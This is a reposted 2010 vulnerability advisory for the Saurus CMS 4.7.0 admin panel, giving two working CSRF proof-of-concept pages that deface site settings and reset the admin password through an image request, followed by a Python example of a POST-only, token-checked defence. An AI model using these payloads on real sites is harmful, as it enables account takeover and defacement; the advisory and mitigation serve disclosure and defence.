[Repost][Recommended] Multiple CSRF Vulnerabilities in Saurus CMS Admin Panel
Posted on: 2010-8-15 16:58 1869

# Author: Fady Mohammed Osman (cute hacker)
# Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz
# Version: 4.7.0
# Tested on: Ubuntu 10.04
# CVE : [Not available]
# This vulnerability allows a malicious hacker to change the password of a user,
# and it also allows changing the website information.

PoC 1:

<html>
<head><title>Saurus CSRF : Change site information</title></head>
<body>
<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">
</body>
</html>

PoC 2:

<html>
<head><title>Saurus CSRF : Change user's password</title></head>
<body>
<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">
</body>
</html>
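Both PoCs work because change_config.php and edit_user.php perform the change on a plain GET carrying no per-session secret, so any page a logged-in admin views can fire the request through an image load. The check below is an added, stand-alone illustration of the mitigation (not Saurus CMS code): state-changing admin paths are accepted only over POST and only with a per-session token compared in constant time. The Request class, the STATE_CHANGING set and the demo requests are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict

# The two admin scripts named in the advisory; both change server-side state
# and were reachable with a plain GET, which is what let an <img src=...>
# on another site trigger them in a logged-in admin's browser.
STATE_CHANGING = {"/admin/change_config.php", "/admin/edit_user.php"}

@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request (no real framework)."""
    method: str
    path: str
    params: Dict[str, str]

def new_session_token() -> str:
    """Per-session secret, kept server-side and embedded in every admin form."""
    return secrets.token_hex(32)

def csrf_check(req: Request, session_token: str) -> str:
    """Return 'ok' if the request may change state, else the rejection reason.

    Rule 1: state changes only over POST, so an image or link fetch cannot cause them.
    Rule 2: the submitted token must equal the session's token; the comparison
            is constant-time (and on bytes) so it leaks nothing via timing.
    """
    if req.path not in STATE_CHANGING:
        return "ok"
    if req.method != "POST":
        return "rejected: state change attempted over " + req.method
    submitted = req.params.get("csrf_token", "")
    if not submitted or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return "rejected: missing or wrong csrf token"
    return "ok"

def demo() -> Dict[str, str]:
    """Replay the shape of both PoCs, a forged POST, and a legitimate submit."""
    token = new_session_token()
    poc1 = Request("GET", "/admin/change_config.php", {"site_name": "x", "save": "1"})
    poc2 = Request("GET", "/admin/edit_user.php", {"user_id": "19", "password": "x"})
    forged_post = Request("POST", "/admin/edit_user.php", {"user_id": "19"})
    legit = Request("POST", "/admin/edit_user.php",
                    {"user_id": "19", "csrf_token": token})
    return {name: csrf_check(r, token) for name, r in
            [("poc1", poc1), ("poc2", poc2), ("forged_post", forged_post),
             ("legit", legit)]}
```

A token-only check without rule 1 would still block both PoCs, but rejecting GET outright also removes the class of bug where the token is accidentally leaked in a URL.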
